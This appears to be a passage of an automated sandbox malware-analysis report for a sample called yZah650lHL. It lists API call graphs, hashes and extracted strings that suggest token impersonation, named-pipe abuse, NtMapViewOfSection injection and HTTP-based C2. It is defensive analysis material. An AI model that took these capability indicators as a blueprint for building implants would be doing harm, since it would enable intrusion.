                    • GetCurrentDirectoryW.KERNEL32 ref: 006715DC
                    • CreateProcessWithLogonW.ADVAPI32 ref: 00671637
                    • GetLastError.KERNEL32 ref: 00671641
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                    • String ID: %s as %s\%s: %d
                    • API String ID: 3435635427-816037529
                    • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                    • Instruction ID: 80a158382953b88b06e520f675666d0f8cd5c6e7d3343fb356ae6e5c51471de1
                    • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                    • Instruction Fuzzy Hash: 35515A32204B8186DB60DF16F85475AB7AAF789B80F54802AEF8D97F29DF39C055CB44
                    APIs
                      • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                      • Part of subcall function 001BFA20: _errno.LIBCMT ref: 001BF977
                      • Part of subcall function 001BFA20: _invalid_parameter_noinfo.LIBCMT ref: 001BF982
                    • fseek.LIBCMT ref: 001B0B30
                      • Part of subcall function 001C02A4: _errno.LIBCMT ref: 001C02CC
                      • Part of subcall function 001C02A4: _invalid_parameter_noinfo.LIBCMT ref: 001C02D7
                    • _ftelli64.LIBCMT ref: 001B0B38
                      • Part of subcall function 001C0318: _errno.LIBCMT ref: 001C0336
                      • Part of subcall function 001C0318: _invalid_parameter_noinfo.LIBCMT ref: 001C0341
                    • fseek.LIBCMT ref: 001B0B48
                      • Part of subcall function 001C02A4: _fseek_nolock.LIBCMT ref: 001C02F5
                    • malloc.LIBCMT ref: 001B0B88
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                      • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                    • fclose.LIBCMT ref: 001B0C45
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                    • String ID: mode
                    APIs
                    • malloc.LIBCMT ref: 001B864F
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • _snprintf.LIBCMT ref: 001B8667
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • free.LIBCMT ref: 001B867E
                      • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                    • malloc.LIBCMT ref: 001B86CE
                    • _snprintf.LIBCMT ref: 001B86E6
                    • free.LIBCMT ref: 001B870E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                    • String ID: /'); %s
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$OpenProcessToken
                    • String ID:
                    APIs
                    • _errno.LIBCMT ref: 001BF236
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _invalid_parameter_noinfo.LIBCMT ref: 001BF242
                    • __crtIsPackagedApp.LIBCMT ref: 001BF253
                    • _dosmaperr.LIBCMT ref: 001BF29D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068FC04
                      • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                      • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                      • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                    • _errno.LIBCMT ref: 0068FC1F
                    • _invalid_parameter_noinfo.LIBCMT ref: 0068FC2A
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                    • String ID:
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CF004
                      • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                      • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                      • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                    • _errno.LIBCMT ref: 001CF01F
                    • _invalid_parameter_noinfo.LIBCMT ref: 001CF02A
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTickioctlsocket
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                    • String ID:
                    APIs
                    • malloc.LIBCMT ref: 001B1063
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                      • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                    • free.LIBCMT ref: 001B115E
                    • free.LIBCMT ref: 001B116B
                      • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$freemalloc$_callnewh
                    • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                    APIs
                    • _mtinitlocknum.LIBCMT ref: 0068A375
                      • Part of subcall function 00683E58: _FF_MSGBANNER.LIBCMT ref: 00683E75
                      • Part of subcall function 00683E58: _NMSG_WRITE.LIBCMT ref: 00683E7F
                    • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0068A3F8
                    • EnterCriticalSection.KERNEL32 ref: 0068A414
                    • LeaveCriticalSection.KERNEL32 ref: 0068A424
                    • _calloc_crt.LIBCMT ref: 0068A49A
                    • __lock_fhandle.LIBCMT ref: 0068A502
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                    • String ID:
                    APIs
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                      • Part of subcall function 00680620: _errno.LIBCMT ref: 00680577
                      • Part of subcall function 00680620: _invalid_parameter_noinfo.LIBCMT ref: 00680582
                    • fseek.LIBCMT ref: 00671730
                      • Part of subcall function 00680EA4: _errno.LIBCMT ref: 00680ECC
                      • Part of subcall function 00680EA4: _invalid_parameter_noinfo.LIBCMT ref: 00680ED7
                    • _ftelli64.LIBCMT ref: 00671738
                      • Part of subcall function 00680F18: _errno.LIBCMT ref: 00680F36
                      • Part of subcall function 00680F18: _invalid_parameter_noinfo.LIBCMT ref: 00680F41
                    • fseek.LIBCMT ref: 00671748
                      • Part of subcall function 00680EA4: _fseek_nolock.LIBCMT ref: 00680EF5
                    • GetFullPathNameA.KERNEL32 ref: 0067176B
                    • malloc.LIBCMT ref: 00671788
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                      • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                      • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                    • fclose.LIBCMT ref: 00671845
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                    • String ID:
                    APIs
                    • GetACP.KERNEL32 ref: 00675C78
                    • GetOEMCP.KERNEL32 ref: 00675C82
                    • GetCurrentProcessId.KERNEL32 ref: 00675CA8
                    • GetTickCount.KERNEL32 ref: 00675CB0
                      • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                    • GetCurrentProcess.KERNEL32 ref: 00675CEC
                      • Part of subcall function 00670C64: GetModuleHandleA.KERNEL32 ref: 00670C79
                      • Part of subcall function 00670C64: GetProcAddress.KERNEL32 ref: 00670C89
                    • GetCurrentProcessId.KERNEL32 ref: 00675D5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                    • String ID:
                    APIs
                    • malloc.LIBCMT ref: 00676F5E
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • htonl.WS2_32 ref: 00676F91
                    • recvfrom.WS2_32 ref: 00676FD5
                    • WSAGetLastError.WS2_32 ref: 00676FE2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                    • String ID:
                    APIs
                    • malloc.LIBCMT ref: 0066FC85
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • free.LIBCMT ref: 0066FCC0
                    • fwrite.LIBCMT ref: 0066FD01
                    • fclose.LIBCMT ref: 0066FD09
                    • free.LIBCMT ref: 0066FD16
                      • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                      • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                      • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                    • GetLastError.KERNEL32 ref: 0066FD1B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                    • String ID:
                    APIs
                    • malloc.LIBCMT ref: 0067F00F
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • malloc.LIBCMT ref: 0067F01D
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                    • malloc.LIBCMT ref: 0067F03F
                    • _snprintf.LIBCMT ref: 0067F05A
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • malloc.LIBCMT ref: 0067F075
                    Strings
                    • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0067F044
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                    • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                    APIs
                    • malloc.LIBCMT ref: 001BE40F
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • malloc.LIBCMT ref: 001BE41D
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                    • malloc.LIBCMT ref: 001BE43F
                    • _snprintf.LIBCMT ref: 001BE45A
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • malloc.LIBCMT ref: 001BE475
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                    • String ID: dpoolWait
                    • API String ID: 2026495703-1875951006
                    • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                    • Instruction ID: 6bb0191720dd6e5e514b52e385db50caed7c4f5a737b4c4f143b590beaf4cb2e
                    • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                    • Instruction Fuzzy Hash: 0301DEB1700B9081DA04DB52B844799B7D9F7B8FE0F05822AEFA947BC5CF78C0418780
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: freemallocstrchr$rand
                    • String ID:
                    • API String ID: 1305919620-0
                    • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                    • Instruction ID: b37816b41801c4281175eb57c47ed9b6b93ee4c20e9b0afe91c745b2bdfa0cfe
                    • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                    • Instruction Fuzzy Hash: 5B613A62208FD481EA269F39A4013EAA392EF95BD4F088129DF8D17715EF3DC243D304
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: freemallocstrchr$rand
                    • String ID:
                    • API String ID: 1305919620-0
                    • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                    • Instruction ID: 4621b4367b0e2598b79348c7eaca8d736ce7e3cd8140e4c037f313f146006020
                    • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                    • Instruction Fuzzy Hash: 2961F862608FC481EA269F29A4113EAB7A0EFA5BD4F085215DF8917B65EF3DC14BC700
                    APIs
                    • malloc.LIBCMT ref: 006641BD
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • malloc.LIBCMT ref: 006641C8
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                    • free.LIBCMT ref: 006642AF
                    • free.LIBCMT ref: 006642B7
                    • free.LIBCMT ref: 006642BF
                    • free.LIBCMT ref: 006642CB
                    • free.LIBCMT ref: 006642D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc$AllocHeap
                    • String ID:
                    • API String ID: 996410232-0
                    • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                    • Instruction ID: 2d4a88687e5d7507016a98631cb0bebce9c8d6f38e5837d614730d00a0240c0c
                    • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                    • Instruction Fuzzy Hash: 074134323047828BDB59DBA699607AB275AFB49BC0F604124EF1A47B05DF38DA62C704
                    APIs
                    • malloc.LIBCMT ref: 001A35BD
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • malloc.LIBCMT ref: 001A35C8
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                    • free.LIBCMT ref: 001A36AF
                    • free.LIBCMT ref: 001A36B7
                    • free.LIBCMT ref: 001A36BF
                    • free.LIBCMT ref: 001A36CB
                    • free.LIBCMT ref: 001A36D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc
                    • String ID:
                    • API String ID: 2761444284-0
                    • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                    • Instruction ID: abc562699c1c0602eaef7a062d5cb2216df987cc85915ee2cd16499f8642370d
                    • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                    • Instruction Fuzzy Hash: E941F326300791ABDB15DF27A9603AE6761FB6ABC0F444024EF6A47701EF38DA67C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: htonl$freemalloc
                    • String ID: zyxwvutsrqponmlk
                    • API String ID: 1249573706-3884694604
                    • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                    • Instruction ID: 71bde60fd73a793298d6e4adf1f89da9c9d25217c6deb7eab5dc2c0ca77e50fb
                    • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                    • Instruction Fuzzy Hash: CC21373230078046DB94EBB6E56132D6AD3AB89BD0F04803CEE5E87B5BEE3CC5468344
                    APIs
                    • GetModuleHandleA.KERNEL32 ref: 00673FE7
                    • GetProcAddress.KERNEL32 ref: 00673FF7
                    • GetLastError.KERNEL32 ref: 006740BF
                      • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                      • Part of subcall function 0067D134: GetCurrentProcess.KERNEL32 ref: 0067D161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                    • String ID: NtMapViewOfSection$ntdll.dll
                    • API String ID: 1006775078-3170647572
                    • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                    • Instruction ID: 40f3ebebb26c67e1b7042a69d92add0a9986f91f53ff5cdcb4679804f439bff7
                    • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                    • Instruction Fuzzy Hash: 3B31EF32710B4482EB10DB22E45976A73A2F788BB4F048329EF6D07B95DF3DC4468B44
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: signal
                    • String ID: CCG
                    • API String ID: 1946981877-1584390748
